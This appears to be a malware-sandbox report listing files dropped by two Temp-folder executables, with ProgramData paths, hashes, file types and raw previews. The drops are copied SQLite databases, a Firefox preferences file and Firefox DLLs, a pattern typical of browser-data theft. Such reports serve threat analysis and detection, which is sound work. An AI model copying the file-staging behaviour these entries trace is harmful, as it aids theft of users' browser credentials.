                                                                                                                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\ProgramData\5PPP8YCJW4E3\RQ1VK6

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):106496
                                                                                                                                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\ProgramData\5PPP8YCJW4E3\Y58GDT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):159744
                                                                                                                                                                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\ProgramData\5PPP8YCJW4E3\Y5XTR9

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                Entropy (8bit):4.688284131239007
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                                                                                                MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                                                                                                SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                                                                                                SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                                                                                                SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

                                                                                                                                                                                                                                                C:\ProgramData\5PPP8YCJW4E3\Y5XTR9HDB

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):49152
                                                                                                                                                                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\ProgramData\5PPP8YCJW4E3\YCBAAI

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                                MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                                SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                                SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                                SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                                                                                                                                                                                                C:\ProgramData\5PPP8YCJW4E3\YM7G4E

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                Entropy (8bit):4.688284131239007
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                                                                                                MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                                                                                                SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                                                                                                SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                                                                                                SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

                                                                                                                                                                                                                                                C:\ProgramData\ECGHCBGC

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):106496
                                                                                                                                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\ProgramData\FHCAEGCBFHJDGCBFHDAFBAFIII

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):5242880
                                                                                                                                                                                                                                                Entropy (8bit):0.037963276276857943
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                                                                                                MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                                                                                                SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                                                                                                SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                                                                                                SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\ProgramData\FHCBGDAAFBKEBGDHDBKE

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\ProgramData\HDHCGHDHIDHCBGCBGCAE

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):49152
                                                                                                                                                                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\ProgramData\JJDBAAEGDBKKECBGIJEBGDAEBF

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):98304
                                                                                                                                                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\ProgramData\JJKEBGHJ

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):114688
                                                                                                                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\ProgramData\KKJKEBKFCAAECAAAAAEC

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9816
                                                                                                                                                                                                                                                Entropy (8bit):5.5323081253820385
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:qnaRtZYbBp6ihj4qyaaX86KakfGNBw8MJSl:degquOcwV0
                                                                                                                                                                                                                                                MD5:72E631CDC5B4127D54EAFB484B4E43D3
                                                                                                                                                                                                                                                SHA1:252C1774D233078675ABAD8F13DF1FC1EE3B7DA4
                                                                                                                                                                                                                                                SHA-256:58D057DB1A3CFF3E178A0509E956A1CCD2FB5C8115773764686EA6E947D7CFEA
                                                                                                                                                                                                                                                SHA-512:C421810480C65DB90554E7677601D15979311C6CE2E1BDC026BF2551A581DA6EC9A61090C075CE6E2B13B412D22468089A59799A9FC87DE357870C194A4068F8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                C:\ProgramData\freebl3.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):685392
                                                                                                                                                                                                                                                Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\ProgramData\mozglue.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):608080
                                                                                                                                                                                                                                                Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
